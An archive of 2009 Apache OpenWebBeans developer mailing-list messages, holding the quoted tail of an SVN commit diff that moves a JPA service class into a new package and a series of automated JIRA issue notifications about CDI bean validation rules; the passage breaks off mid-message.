http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-gero= nimo/src/main/java/org/apache/webbeans/spi/ee/openejb/jpa/JPAServiceOpenEJB= Impl.java?p2=3Dincubator/openwebbeans/trunk/webbeans-geronimo/src/main/java= /org/apache/webbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java&p1=3Dinc= ubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/webbea= ns/spi/ee/openejb/JPAServiceOpenEJBImpl.java&r1=3D782277&r2=3D786229&rev=3D= 786229&view=3Ddiff > > > > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > > --- > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/JPAServiceOpenEJBImpl.java > > > (original) > > > +++ > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/main/java/org/apache/w= ebbeans/spi/ee/openejb/jpa/JPAServiceOpenEJBImpl.java > > > Thu Jun 18 19:51:03 2009 > > > @@ -11,7 +11,7 @@ > > >=A0=A0=A0* KIND, either express or > implied. See the License > > > for the specific language > > >=A0=A0=A0* governing permissions and > limitations under the > > > License. > > >=A0=A0=A0*/ > > > -package org.apache.webbeans.spi.ee.openejb; > > > +package org.apache.webbeans.spi.ee.openejb.jpa; > > > > > >=A0 import > javax.enterprise.inject.CreationException; > > >=A0 import javax.naming.Context; > > > > > > Modified: > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > > URL: > > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-gero= nimo/src/test/java/org/apache/webbeans/test/geronimo/openejb/OpenEJBIntegra= tionTest.java?rev=3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > > > > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > > --- > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > > (original) > > > +++ > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/java/org/apache/w= ebbeans/test/geronimo/openejb/OpenEJBIntegrationTest.java > > > Thu Jun 18 19:51:03 2009 > > > @@ -23,7 +23,7 @@ > > >=A0 import junit.framework.Assert; > > > > > >=A0 import > org.apache.webbeans.jpa.spi.JPAService; > > > -import > > > > org.apache.webbeans.spi.ee.openejb.JPAServiceOpenEJBImpl; > > > +import > > > > org.apache.webbeans.spi.ee.openejb.jpa.JPAServiceOpenEJBImpl; > > >=A0 import org.junit.Test; > > > > > > > > > > > > Modified: > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > > URL: > > http://svn.apache.org/viewvc/incubator/openwebbeans/trunk/webbeans-gero= nimo/src/test/resources/META-INF/openwebbeans/openwebbeans.properties?rev= =3D786229&r1=3D786228&r2=3D786229&view=3Ddiff > > > > > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > > --- > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > > (original) > > > +++ > > > > > > incubator/openwebbeans/trunk/webbeans-geronimo/src/test/resources/META-IN= F/openwebbeans/openwebbeans.properties > > > Thu Jun 18 19:51:03 2009 > > > @@ -36,7 +36,7 @@ > > > > > > > > > org.apache.webbeans.spi.TransactionService=3Dorg.apache.webbeans.spi.ee.T= ransactionServiceJndiImpl > > > > > >=A0 # use the JPAService which retrieves the > > > PersistenceManagerFactory from the Persistence > class as > > > default > > > > > > -org.apache.webbeans.spi.JPAService=3Dorg.apache.webbeans.spi.ee.openejb.= JPAServiceOpenEJBImpl > > > > > > +org.apache.webbeans.spi.JPAService=3Dorg.apache.webbeans.spi.ee.openejb.= jpa.JPAServiceOpenEJBImpl > > > > > >=A0 #use the web metadata as default > > > > > > > > > org.apache.webbeans.spi.deployer.MetaDataDiscoveryService=3Dorg.apache.we= bbeans.spi.ee.deployer.WarMetaDataDiscoveryImpl > > > > > > > > > > > > > > > > > >=20 >=20 > --=20 > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com > =0A=0A=0A From [email protected] Fri Jun 19 20:26:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43126 invoked from network); 19 Jun 2009 20:26:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 20:26:18 -0000 Received: (qmail 73614 invoked by uid 500); 19 Jun 2009 20:26:29 -0000 Delivered-To: [email protected] Received: (qmail 73598 invoked by uid 500); 19 Jun 2009 20:26:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73543 invoked by uid 99); 19 Jun 2009 20:26:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:26:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:26:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 65EEF29A0014 for <[email protected]>; Fri, 19 Jun 2009 13:26:07 -0700 (PDT) Message-ID: <1446444782.1245443167416.JavaMail.jira@brutus> Date: Fri, 19 Jun 2009 13:26:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-98) Check ManagedBean Public Field MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Check ManagedBean Public Field ------------------------------ Key: OWB-98 URL: https://issues.apache.org/jira/browse/OWB-98 Project: OpenWebBeans Issue Type: Improvement Components: Simple Web Beans Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 If a managed bean has a public field, it must have scope @Dependent. If a managed bean with a public field declares any scope other than @Dependent, the container automatically detects the problem and treats it as a definition error, as defined in Section 12.4, "Problems detected automatically by the container". -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 19 20:28:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43767 invoked from network); 19 Jun 2009 20:28:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 20:28:18 -0000 Received: (qmail 77600 invoked by uid 500); 19 Jun 2009 20:28:29 -0000 Delivered-To: [email protected] Received: (qmail 77574 invoked by uid 500); 19 Jun 2009 20:28:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77564 invoked by uid 99); 19 Jun 2009 20:28:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:28:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:28:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6E04F29A0013 for <[email protected]>; Fri, 19 Jun 2009 13:28:07 -0700 (PDT) Message-ID: <183241587.1245443287449.JavaMail.jira@brutus> Date: Fri, 19 Jun 2009 13:28:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-68) Support for Child Managers In-Reply-To: <157461452.1232962559721.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-68?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-68. ----------------------------- Resolution: Won't Fix Activities are removed from the specification. > Support for Child Managers > -------------------------- > > Key: OWB-68 > URL: https://issues.apache.org/jira/browse/OWB-68 > Project: OpenWebBeans > Issue Type: Task > Components: Injection and Lookup > Reporter: Gurkan Erdogdu > Assignee: Mark Struberg > Fix For: M3 > > > Support for the Current Manager (Activity) and Child Managers (Activities). See chapter 11.6 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 19 20:40:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50488 invoked from network); 19 Jun 2009 20:40:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 20:40:19 -0000 Received: (qmail 773 invoked by uid 500); 19 Jun 2009 20:40:30 -0000 Delivered-To: [email protected] Received: (qmail 735 invoked by uid 500); 19 Jun 2009 20:40:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 584 invoked by uid 99); 19 Jun 2009 20:40:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:40:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:40:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C641229A0025 for <[email protected]>; Fri, 19 Jun 2009 13:40:07 -0700 (PDT) Message-ID: <64738061.1245444007811.JavaMail.jira@brutus> Date: Fri, 19 Jun 2009 13:40:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-99) Interceptors and decorators may not declare producer methods. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Interceptors and decorators may not declare producer methods. ------------------------------------------------------------- Key: OWB-99 URL: https://issues.apache.org/jira/browse/OWB-99 Project: OpenWebBeans Issue Type: Improvement Components: Interceptor and Decorators Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 Interceptors and decorators may not declare producer methods. If an interce= ptor or decorator has a method annotated @Produces, the container automatically detects the problem and treats it as= a definition error, as defined in Section 12.4, "Problems detected automatically by the container". Decorators & =C4=B1nterceptors are configured in class WebBeansContainerDep= loyer.=20 --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 19 20:42:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51281 invoked from network); 19 Jun 2009 20:42:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 20:42:18 -0000 Received: (qmail 3576 invoked by uid 500); 19 Jun 2009 20:42:29 -0000 Delivered-To: [email protected] Received: (qmail 3554 invoked by uid 500); 19 Jun 2009 20:42:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3544 invoked by uid 99); 19 Jun 2009 20:42:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:42:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:42:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 84A9D234C044 for <[email protected]>; Fri, 19 Jun 2009 13:42:07 -0700 (PDT) Message-ID: <1542542549.1245444127530.JavaMail.jira@brutus> Date: Fri, 19 Jun 2009 13:42:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-100) Update for Disposal Methods MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update for Disposal Methods --------------------------- Key: OWB-100 URL: https://issues.apache.org/jira/browse/OWB-100 Project: OpenWebBeans Issue Type: Improvement Components: Core Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 The disposer method must be declared by the same bean class as the producer= method. Disposer methods are defined in the class DefinitionUtil #=C2=A0defineDispo= salMethods. Update validation logic here. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 19 20:44:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52551 invoked from network); 19 Jun 2009 20:44:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 20:44:24 -0000 Received: (qmail 9148 invoked by uid 500); 19 Jun 2009 20:44:36 -0000 Delivered-To: [email protected] Received: (qmail 9126 invoked by uid 500); 19 Jun 2009 20:44:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9076 invoked by uid 99); 19 Jun 2009 20:44:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:44:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:44:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5BDA4234C044 for <[email protected]>; Fri, 19 Jun 2009 13:44:07 -0700 (PDT) Message-ID: <1594809625.1245444247362.JavaMail.jira@brutus> Date: Fri, 19 Jun 2009 13:44:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-101) Update @New Binding Type for Taking Class Member Method MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update @New Binding Type for Taking Class Member Method ------------------------------------------------------- Key: OWB-101 URL: https://issues.apache.org/jira/browse/OWB-101 Project: OpenWebBeans Issue Type: Improvement Components: Core Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 19 20:46:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54956 invoked from network); 19 Jun 2009 20:46:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 20:46:20 -0000 Received: (qmail 15168 invoked by uid 500); 19 Jun 2009 20:46:31 -0000 Delivered-To: [email protected] Received: (qmail 15148 invoked by uid 500); 19 Jun 2009 20:46:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15138 invoked by uid 99); 19 Jun 2009 20:46:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:46:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 20:46:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 867A629A0013 for <[email protected]>; Fri, 19 Jun 2009 13:46:07 -0700 (PDT) Message-ID: <1784320931.1245444367549.JavaMail.jira@brutus> Date: Fri, 19 Jun 2009 13:46:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-102) Initializer Methods Validation for Generic Methods MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Initializer Methods Validation for Generic Methods -------------------------------------------------- Key: OWB-102 URL: https://issues.apache.org/jira/browse/OWB-102 Project: OpenWebBeans Issue Type: Improvement Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 If a generic method of a bean is annotated @Initializer, the container auto= matically detects the problem and treats it as a definition error, as defined in Section 12.4, "Problems detected automatica= lly by the container". Currently initializer methods are defined in the class DefinitionUtil #=C2= =A0defineInjectedMethods. Update validation logic here. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 10:32:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35109 invoked from network); 20 Jun 2009 10:32:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 10:32:19 -0000 Received: (qmail 10502 invoked by uid 500); 20 Jun 2009 10:32:30 -0000 Delivered-To: [email protected] Received: (qmail 10477 invoked by uid 500); 20 Jun 2009 10:32:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10467 invoked by uid 99); 20 Jun 2009 10:32:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 10:32:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 10:32:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D6C0D234C1E6 for <[email protected]>; Sat, 20 Jun 2009 03:32:07 -0700 (PDT) Message-ID: <1392119015.1245493927878.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 03:32:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-103) Inconsistent Specialization Extra Check For Injection Points MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Inconsistent Specialization Extra Check For Injection Points ------------------------------------------------------------ Key: OWB-103 URL: https://issues.apache.org/jira/browse/OWB-103 Project: OpenWebBeans Issue Type: Improvement Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Section 4.3.3 Suppose an enabled bean X directly specializes a second bean Y. If either: there is an injection point that matches Y and not X, according to the typesafe resolution algorithm defined in Sec- tion 5.3, "Typesafe resolution", Also DeploymentType precedence requirement has gone. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 10:44:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36478 invoked from network); 20 Jun 2009 10:44:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 10:44:20 -0000 Received: (qmail 18169 invoked by uid 500); 20 Jun 2009 10:44:31 -0000 Delivered-To: [email protected] Received: (qmail 18142 invoked by uid 500); 20 Jun 2009 10:44:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18127 invoked by uid 99); 20 Jun 2009 10:44:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 10:44:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 10:44:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 63D79234C1E6 for <[email protected]>; Sat, 20 Jun 2009 03:44:07 -0700 (PDT) Message-ID: <1129867611.1245494647408.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 03:44:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-104) Check Inherited Member for producer methods and fields MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Check Inherited Member for producer methods and fields ------------------------------------------------------ Key: OWB-104 URL: https://issues.apache.org/jira/browse/OWB-104 Project: OpenWebBeans Issue Type: Improvement Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Producer method and producer field creation is define in class DefinitionUtil. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 10:46:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36730 invoked from network); 20 Jun 2009 10:46:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 10:46:20 -0000 Received: (qmail 20213 invoked by uid 500); 20 Jun 2009 10:46:29 -0000 Delivered-To: [email protected] Received: (qmail 20189 invoked by uid 500); 20 Jun 2009 10:46:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20178 invoked by uid 99); 20 Jun 2009 10:46:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 10:46:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 10:46:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C46D2234C004 for <[email protected]>; Sat, 20 Jun 2009 03:46:07 -0700 (PDT) Message-ID: <707204225.1245494767799.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 03:46:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-105) Improve Injection Resolver for Generic Classes MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Improve Injection Resolver for Generic Classes ---------------------------------------------- Key: OWB-105 URL: https://issues.apache.org/jira/browse/OWB-105 Project: OpenWebBeans Issue Type: Improvement Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Generic type resolution is added. Add support for generic types. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 11:12:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41884 invoked from network); 20 Jun 2009 11:12:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 11:12:20 -0000 Received: (qmail 34892 invoked by uid 500); 20 Jun 2009 11:12:31 -0000 Delivered-To: [email protected] Received: (qmail 34863 invoked by uid 500); 20 Jun 2009 11:12:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34783 invoked by uid 99); 20 Jun 2009 11:12:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:12:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 11:12:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6390E234C1E6 for <[email protected]>; Sat, 20 Jun 2009 04:12:07 -0700 (PDT) Message-ID: <497032044.1245496327407.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 04:12:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-106) Update code for new deployment type handling. In-Reply-To: <1175238363.1245496327345.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-106?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-106: ------------------------------- Component/s: Core Affects Version/s: M2 Fix Version/s: M3 > Update code for new deployment type handling. > --------------------------------------------- > > Key: OWB-106 > URL: https://issues.apache.org/jira/browse/OWB-106 > Project: OpenWebBeans > Issue Type: Task > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > Deployment types are removed from the 